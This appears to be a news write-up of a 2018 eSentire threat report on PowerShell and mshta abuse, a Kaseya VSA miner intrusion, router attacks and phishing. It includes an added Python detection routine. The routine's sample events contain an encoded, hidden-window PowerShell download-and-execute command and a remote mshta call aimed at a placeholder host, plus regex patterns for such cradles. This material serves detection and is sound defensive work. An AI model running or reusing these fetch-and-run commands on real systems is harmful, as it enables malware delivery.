91% of critical incidents involve known, legitimate binaries like PowerShell


Opportunistic threat actors are leveraging trusted tools, like PowerShell, to retrieve and execute malicious code from remote sources. According to eSentire, 91% of endpoint incidents detected in Q1 2018 involved known, legitimate binaries, such as PowerShell or mshta.exe.

Figure: Quarter over quarter change in threat type volume

“eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection,” said Eldon Sprickerhoff, chief security strategist, eSentire. “PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters.”
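As an added illustration (not code from the report or from eSentire), the following Python triage routine flags process-creation events that match the pattern described above: PowerShell or mshta.exe launched with a hidden window, an encoded command line, or a download-and-execute command. The sample events, parent-process list and marker strings are constructed assumptions.

```python
import base64
import re

# Constructed sample events (parent image, image, command line); not report data.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile Get-ChildItem C:\\Users"),
    ("winword.exe", "powershell.exe", f"powershell.exe -w hidden -nop -ep bypass -enc {_ENCODED}"),
    ("cmd.exe", "mshta.exe", "mshta.exe http://example.invalid/page.hta"),
    ("svchost.exe", "notepad.exe", "notepad.exe readme.txt"),
]

LOLBINS = {"powershell.exe", "mshta.exe"}      # trusted binaries named in the report
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
# Markers typical of download-and-execute ("download cradle") command lines.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b|net\.webclient|https?://")
# -e / -ec / -enc / -EncodedCommand followed by a base64 token (does not match -ep).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(parent, image, cmdline):
    """Return the reasons this event looks like LOLBin abuse (empty list if benign)."""
    reasons = []
    if image.lower() not in LOLBINS:
        return reasons
    if parent.lower() in OFFICE_PARENTS:
        reasons.append("spawned by Office application")
    text = cmdline.lower()
    if re.search(r"-w(?:indowstyle)?\s+hidden", text):
        reasons.append("hidden window")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        text += " " + decoded.lower()        # inspect the decoded script as well
    if CRADLE_RE.search(text):
        reasons.append("download cradle / remote content")
    return reasons

def analyze_events(events):
    """Run analyze_event over all events and keep only the flagged ones."""
    flagged = []
    for parent, img, cmd in events:
        reasons = analyze_event(parent, img, cmd)
        if reasons:
            flagged.append({"image": img, "cmdline": cmd, "reasons": reasons})
    return flagged
```

Decoding the encoded command before matching is what makes the obfuscated case visible; matching only the raw command line would miss the download cradle in the second event.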

In late January 2018, an eSentire advanced threat analytics operation detected an adversary leveraging an unknown exploit in Kaseya’s Virtual System Administrator (VSA) product to deploy crypto miners across the infrastructure of a small number of eSentire customers. The attack broadly targeted the trusted systems of MSPs and cloud platforms, using Kaseya VSA endpoint agents for initial access and to deliver malicious scripts. eSentire discovered the threat and notified Kaseya of the intrusions, resulting in multiple security fixes.

539% increase in consumer-grade router attacks

The report also indicates a dramatic increase in attacks targeting popular consumer-grade routers, such as Netgear and Linksys (which hold a significant share of the consumer network device market, at 51% and 26% respectively): researchers saw a 539% increase from Q4 2017 to Q1 2018.

The trend in router exploitation was first observed in late 2017, when the Reaper botnet gained media attention. Additionally, intrusion attempts across industries grew 36%, mostly due to DNS manipulation in consumer-grade routers. These manipulations allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages. Other exploit attempts also focused on consumer-grade routers.

“The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points,” said Sprickerhoff.

Figure: Attempted credentials on the eSentire honeypot

Additional findings

  • Phishing rose 39% across industries, with DocuSign, Office 365, and OneDrive as the most popular lures. Office 365 showed the highest success rate and grew 5x in popularity over 2017, despite DocuSign being the most popular lure overall.
  • Education, retail, biotechnology, construction, and non-profit organizations saw the greatest rise in exploit attempts due to a high degree of consumer-grade router exploit attempts, brute forcing, and web server exploit attempts.
  • Most brute force attacks originated from infrastructure based in China, followed by the United States, Germany, and Russia.
  • Malicious code (+35%) and phishing (+39%) saw increases in the first quarter of 2018 with malicious code incidents continuing to favor email as a delivery vector.

“While industry sentiment is focused on the ever-changing threat landscape, the data suggests that it’s the cybercriminal landscape that’s shifting. As we continue to see successful efforts in disrupting malicious infrastructure and comprehensive threat blocking, cybercriminals are forced to diversify their hacking methods. They’re pivoting to use new methods for sustaining infrastructure,” said Sprickerhoff. “Technology is changing rapidly, and as it does, attackers are shifting their techniques to match. The increase in router-based attacks is a prime example.”
